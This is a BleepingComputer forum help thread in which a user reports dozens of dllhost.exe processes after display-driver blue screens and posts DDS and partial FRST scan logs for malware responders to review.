Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

dllhost/COM Surrogate explosion


  • This topic is locked This topic is locked
12 replies to this topic

#1 LynnBR

LynnBR

  • Members
  • 104 posts
  • OFFLINE
  •  
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 04:10 PM

Thanks in advance for your assistance! Computer slowdown resulting from high number of instances of above running. Yesterday computer went BSOD multiple times, 0x116 error pointing to atikmpag.sys. Was able to install updated AMD driver, no more BSOD but now this is rampant. Don't know if they were related or not. Per instructions, have run DDS. As this is similar to many other posts involving dllhost have also run FRST to save time.

 

Please note, I will be unavailable from Friday 8/29 through Tuesday 9/2. If I do not respond to you, it is because I am away, not because I am ignoring you! If you need to close this thread, go ahead, I will open a new one on 9/3.

 

Here is DDS results, will follow with FRST shortly. And thanks again!

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16561
Run by mike at 13:53:10 on 2014-08-28
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8146.4465 [GMT -7:00]
.
AV: ESET Endpoint Antivirus 5.0 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET Endpoint Antivirus 5.0 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\SysWOW64\atashost.exe
C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Windows\system32\IProsetMonitor.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\atieclxx.exe
C:\Program Files\Common Files\SPBA\upeksvr.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe
C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uDefault_Page_URL = hxxp://dell13-comm.msn.com
mWinlogon: Userinit = userinit.exe
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: SmartSelect Class: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
uRun: [Spotify] "C:\Users\mike\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart
uRun: [Spotify Web Helper] "C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe "C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" 60
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [Adobe Acrobat Speed Launcher] "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
StartupFolder: C:\Users\mike\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Reminder.lnk - G:\CheckIn\Chklogin.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\CALLMA~1.LNK - C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
mPolicies-System: DisableCAD = dword:1
mPolicies-System: RunStartupScriptSync = dword:1
IE: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~3\Office14\ONBttnIE.dll/105
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} - hxxps://akamaicdn.webex.com/client/WBXclient-T29L10NSP2-23/support/ieatgpc1.cab
TCP: NameServer = 10.0.0.2
TCP: Interfaces\{21C7905D-B7F8-4D77-9D5D-6EE7082E1374} : DHCPNameServer = 10.0.0.2
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
LSA: Authentication Packages =  msv1_0 wvauth
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
x64-Run: [TdmNotify] C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe
x64-Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: GoToAssist - C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AWinLogon_x64.dll
x64-Notify: spba - C:\Program Files\Common Files\SPBA\homefus2.dll
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2013-2-11 20024]
R1 eamonm;eamonm;C:\Windows\System32\drivers\eamonm.sys [2013-2-4 217000]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2014-4-17 239616]
R2 atashost;WebEx Service Host for Support Center;C:\Windows\SysWOW64\atashost.exe [2014-1-9 117544]
R2 CmRegService;TSD Call Manager Configuration;C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe [2014-8-21 12288]
R2 ekrn;ESET Service;C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [2013-2-14 1020304]
R2 EmbassyService;EmbassyService;C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [2012-1-17 218504]
R2 epfwwfpr;epfwwfpr;C:\Windows\System32\drivers\epfwwfpr.sys [2013-2-4 141304]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2013-2-11 13632]
R2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-7-27 636952]
R2 Intel® PROSet Monitoring Service;Intel® PROSet Monitoring Service;C:\Windows\System32\IPROSetMonitor.exe [2012-7-27 170824]
R2 jhi_service;Intel® Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe [2013-2-11 166432]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2013-2-11 95248]
R3 iusb3hub;Intel® USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2013-2-11 358456]
R3 iusb3xhc;Intel® USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2013-2-11 791608]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-11 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S3 dmvsc;dmvsc;C:\Windows\System32\drivers\dmvsc.sys [2010-11-21 71168]
S3 ESHASRV;ESET SHA Service;C:\Program Files\ESET\ESET NOD32 Antivirus\EShaSrv.exe [2013-2-14 190208]
S3 netvsc;netvsc;C:\Windows\System32\drivers\netvsc60.sys [2010-11-21 168448]
S3 SynthVid;SynthVid;C:\Windows\System32\drivers\VMBusVideoM.sys [2010-11-21 22528]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-20 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-20 31232]
.
=============== Created Last 30 ================
.
2014-08-27 23:23:18 -------- d-----w- C:\Program Files\AMD
2014-08-27 21:54:56 -------- d-----w- C:\Program Files (x86)\Raptr
2014-08-27 21:54:54 -------- d-----w- C:\ProgramData\AMD
2014-08-27 21:54:53 -------- d-----w- C:\Program Files (x86)\AMD AVT
2014-08-27 21:54:52 -------- d-----w- C:\Program Files (x86)\Common Files\ATI Technologies
2014-08-27 21:54:18 -------- d-----w- C:\Program Files\Common Files\ATI Technologies
2014-08-27 21:54:10 -------- d-----w- C:\Program Files (x86)\ATI Technologies
2014-08-27 21:53:51 -------- d-----w- C:\ProgramData\Package Cache
2014-08-27 21:53:12 -------- d-----w- C:\Program Files\ATI Technologies
2014-08-27 21:52:26 -------- d-----w- C:\AMD
2014-08-27 20:06:49 -------- d-----w- C:\ProgramData\PCDr
2014-08-27 20:06:49 -------- d-----w- C:\ProgramData\PC-Doctor for Windows
2014-08-27 20:06:48 -------- d-----w- C:\Program Files\Dell Support Center
2014-08-27 20:06:32 -------- d-----w- C:\Program Files\My Dell
2014-08-27 20:03:20 -------- d-----w- C:\temp
2014-08-27 18:50:21 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-08-27 18:50:11 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-08-27 18:50:11 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-08-27 18:50:11 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-08-27 18:50:11 -------- d-----w- C:\ProgramData\Malwarebytes
2014-08-27 18:50:11 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-21 16:36:39 41472 ----a-w- C:\Windows\SysWow64\agphlink.tsp
2014-08-21 16:36:12 220672 ----a-w- C:\Windows\SysWow64\intrtspi.tsp
2014-08-21 16:35:54 -------- d-----w- C:\Program Files (x86)\Jabra
2014-08-21 16:35:33 -------- d-----w- C:\Program Files (x86)\Plantronics
2014-08-21 16:35:12 81920 ----a-w- C:\Windows\SysWow64\DumpWin.ocx
2014-08-21 16:35:12 69632 ----a-w- C:\Windows\SysWow64\playrec.ocx
2014-08-21 16:35:12 626688 ----a-w- C:\Windows\SysWow64\msvcr80.dll
2014-08-21 16:35:12 61440 ----a-w- C:\Windows\SysWow64\CTSMail.dll
2014-08-21 16:35:12 53306 ----a-w- C:\Windows\SysWow64\sock.ocx
2014-08-21 16:35:12 40960 ----a-w- C:\Windows\SysWow64\DDEWrap.ocx
2014-08-21 16:35:12 131155 ----a-w- C:\Windows\SysWow64\gtapiocx.ocx
2014-08-21 16:35:12 127037 ----a-w- C:\Windows\SysWow64\eClient.ocx
2014-08-21 16:35:06 368912 ----a-w- C:\Windows\SysWow64\vbar332.dll
2014-08-21 16:35:06 -------- d-----w- C:\Program Files (x86)\Toshiba
2014-08-20 09:01:30 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{1BDBBEDF-B4EB-4940-9A20-590E40F77114}\offreg.dll
2014-08-14 16:12:30 -------- d-----w- C:\Program Files\ESET
2014-08-06 10:04:08 936960 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\ink\journal.dll
2014-08-06 10:04:08 1389568 ----a-w- C:\Program Files\Windows Journal\JNWDRV.dll
2014-08-06 10:04:08 1380864 ----a-w- C:\Program Files\Windows Journal\JNTFiltr.dll
2014-08-06 10:04:07 1719296 ----a-w- C:\Program Files\Windows Journal\NBDoc.DLL
2014-08-06 10:04:07 1354240 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\journal.dll
2014-08-06 10:03:07 544768 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\TipRes.dll
2014-08-06 10:03:07 449024 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\tabskb.dll
2014-08-06 10:03:07 224768 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.exe
2014-08-06 10:03:07 110592 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\TipBand.dll
2014-08-06 10:03:07 10240 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\ink\TabTip32.exe
2014-08-06 10:03:06 692736 ----a-w- C:\Windows\System32\osk.exe
2014-08-06 10:03:06 646144 ----a-w- C:\Windows\SysWow64\osk.exe
2014-08-06 10:03:06 503296 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\tiptsf.dll
2014-08-06 10:03:06 348672 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll
2014-08-06 10:03:06 3157504 ----a-w- C:\Windows\System32\win32k.sys
2014-08-06 10:03:06 1247232 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\tipskins.dll
2014-08-06 10:02:33 624128 ----a-w- C:\Windows\System32\qedit.dll
2014-08-06 10:02:33 509440 ----a-w- C:\Windows\SysWow64\qedit.dll
2014-08-06 10:02:24 497152 ----a-w- C:\Windows\System32\drivers\afd.sys
.
==================== Find3M  ====================
.
2014-08-27 20:00:19 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-08-27 20:00:19 699568 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-06-07 02:59:53 2339328 ----a-w- C:\Windows\System32\jscript9.dll
2014-06-07 02:51:22 1494016 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-06-07 02:51:06 1392128 ----a-w- C:\Windows\System32\wininet.dll
2014-06-07 02:45:37 173056 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-06-07 02:45:17 599040 ----a-w- C:\Windows\System32\vbscript.dll
2014-06-07 02:40:25 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2014-06-07 02:39:40 12800 ----a-w- C:\Windows\System32\mshta.exe
2014-06-06 23:12:01 1810432 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-06-06 23:03:02 1427968 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-06-06 23:02:16 1129472 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-06-06 22:57:04 142848 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-06-06 22:56:20 421376 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-06-06 22:52:42 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-06-06 22:51:59 11776 ----a-w- C:\Windows\SysWow64\mshta.exe
2014-06-05 14:45:15 1460736 ----a-w- C:\Windows\System32\lsasrv.dll
2014-06-05 14:26:58 22016 ----a-w- C:\Windows\SysWow64\secur32.dll
2014-06-05 14:25:49 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
.
============= FINISH: 13:58:03.66 ===============
 

 

Attached Files



BC AdBot (Login to Remove)

 


#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 04:19 PM

Hi there,

I'm waiting for the FRST logs. :)

#3 LynnBR

LynnBR
  • Topic Starter

  • Members
  • 104 posts
  • OFFLINE
  •  
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 04:23 PM

Here they are, you're quicker than I am! Had to use ProcessExplorer to kill dllhost so I could work faster than a snail. Also, whatever is in here keeps resetting IE security to Custom Level and preventing downloads, have to go in and set to default to download files, if that information helps.

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 25-08-2014
Ran by mike (administrator) on E2013-3 on 28-08-2014 14:19:04
Running from C:\Users\mike\Desktop
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Cisco WebEx LLC) C:\Windows\SysWOW64\atashost.exe
(Toshiba America Information Systems, Inc.) C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(SafeNet, Inc) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(AMD) C:\Windows\System32\atieclxx.exe
(UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(Spotify Ltd) C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(Toshiba America Information Systems, Inc.) C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Sysinternals - www.sysinternals.com) C:\Users\mike\Desktop\ProcessExplorer\ProcExp.exe
(Sysinternals - www.sysinternals.com) C:\Users\mike\AppData\Local\Temp\ProcExp64.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe [2907240 2011-07-20] (Realtek Semiconductor Corp.)
HKLM\...\Run: [TdmNotify] => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe [381296 2011-12-08] (Wave Systems Corp.)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [4144944 2013-02-14] (ESET)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284480 2012-05-30] (Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-10-16] (Intel Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41336 2014-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840568 2014-05-08] (Adobe Systems Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-17] (Advanced Micro Devices, Inc.)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.)
HKU\S-1-5-21-462157724-132793273-1689201830-1165\...\Run: [Spotify] => C:\Users\mike\AppData\Roaming\Spotify\Spotify.exe [6621752 2014-08-27] (Spotify Ltd)
HKU\S-1-5-21-462157724-132793273-1689201830-1165\...\Run: [Spotify Web Helper] => C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1245752 2014-08-27] (Spotify Ltd)
